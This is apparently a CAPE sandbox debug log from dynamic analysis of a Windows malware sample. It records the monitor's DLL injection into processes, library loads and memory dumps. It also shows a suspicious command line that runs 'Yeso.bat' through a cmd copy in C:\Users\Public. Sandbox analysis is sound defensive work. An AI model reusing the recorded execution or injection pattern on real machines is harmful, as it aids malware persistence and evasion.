2020-03-24 10:13:43,198 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,214 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:43,214 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,214 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2020-03-24 10:13:43,230 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:43,246 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:43,276 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:43,276 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2444 at 0x74880000, image base 0x4aad0000, stack from 0x363000-0x460000
2020-03-24 10:13:43,276 [root] DEBUG: Commandline: C:\Users\Public\cmd \c ""C:\Users\Public\Yeso.bat" ".
2020-03-24 10:13:43,292 [root] INFO: Added new process to list with pid: 2444
2020-03-24 10:13:43,292 [root] INFO: Monitor successfully loaded in process with pid 2444.
2020-03-24 10:13:43,371 [root] INFO: Announced 64-bit process name: perfmon.exe pid: 1380
2020-03-24 10:13:43,371 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:43,385 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,385 [root] DEBUG: Loader: Injecting process 1380 (thread 1808) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,385 [root] DEBUG: Process image base: 0x000000013FB90000
2020-03-24 10:13:43,401 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,401 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:43,401 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,401 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1380
2020-03-24 10:13:43,401 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 10:13:43,417 [root] DEBUG: DLL loaded at 0x73DA0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 10:13:43,417 [root] DEBUG: DLL loaded at 0x73CA0000: C:\Windows\SysWOW64\PROPSYS (0xf5000 bytes).
2020-03-24 10:13:43,433 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 10:13:43,433 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 10:13:43,463 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2020-03-24 10:13:43,480 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2020-03-24 10:13:43,496 [root] DEBUG: DLL loaded at 0x74860000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2020-03-24 10:13:43,510 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 10:13:43,510 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 10:13:44,463 [root] INFO: Announced 64-bit process name: perfmon.exe pid: 2788
2020-03-24 10:13:44,463 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:44,477 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:44,477 [root] DEBUG: Loader: Injecting process 2788 (thread 2152) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [root] DEBUG: Process image base: 0x000000013F750000
2020-03-24 10:13:44,493 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:44,493 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2788
2020-03-24 10:13:44,602 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\ndfapi (0x34000 bytes).
2020-03-24 10:13:44,665 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\wdi (0x15000 bytes).
2020-03-24 10:13:44,665 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x73C80000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-03-24 10:13:44,805 [root] DEBUG: DLL loaded at 0x73C50000: C:\Windows\SysWOW64\DUser (0x2f000 bytes).
2020-03-24 10:13:44,930 [root] DEBUG: DLL loaded at 0x73BD0000: C:\Windows\SysWOW64\UxTheme (0x80000 bytes).
2020-03-24 10:13:44,993 [root] DEBUG: DLL loaded at 0x73BB0000: C:\Windows\SysWOW64\dwmapi (0x13000 bytes).
2020-03-24 10:13:45,039 [root] DEBUG: DLL loaded at 0x73B80000: C:\Windows\system32\xmllite (0x2f000 bytes).
2020-03-24 10:13:45,221 [root] DEBUG: DLL unloaded from 0x73B80000.
2020-03-24 10:13:46,125 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2020-03-24 10:13:47,140 [root] DEBUG: DLL unloaded from 0x758B0000.
2020-03-24 10:13:47,140 [root] DEBUG: DLL unloaded from 0x754F0000.
2020-03-24 10:13:47,155 [root] DEBUG: DLL unloaded from 0x73C50000.
2020-03-24 10:13:47,155 [root] DEBUG: DLL unloaded from 0x73DA0000.
2020-03-24 10:13:47,171 [root] DEBUG: DLL unloaded from 0x772F0000.
2020-03-24 10:13:47,171 [root] DEBUG: DLL unloaded from 0x74810000.
2020-03-24 10:13:47,201 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 10:13:47,217 [root] DEBUG: DLL unloaded from 0x73CA0000.
2020-03-24 10:13:47,249 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2444
2020-03-24 10:13:47,249 [root] DEBUG: GetHookCallerBase: thread 1472 (handle 0x0), return address 0x4AAD7302, allocation base 0x4AAD0000.
2020-03-24 10:13:47,249 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2444.dmp.
2020-03-24 10:13:47,592 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4AAD0000.
2020-03-24 10:13:47,592 [root] DEBUG: ApiReader: module list size: 33
2020-03-24 10:13:47,608 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,608 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:47,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,872 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,888 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,904 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,920 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,936 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,936 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,950 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,982 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,997 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,013 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,029 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,045 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,122 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,138 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,170 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,170 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,184 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,200 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,216 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,232 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,247 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,263 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:48,279 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:48,293 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,293 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:48,293 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:48,309 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:48,309 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:48,325 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
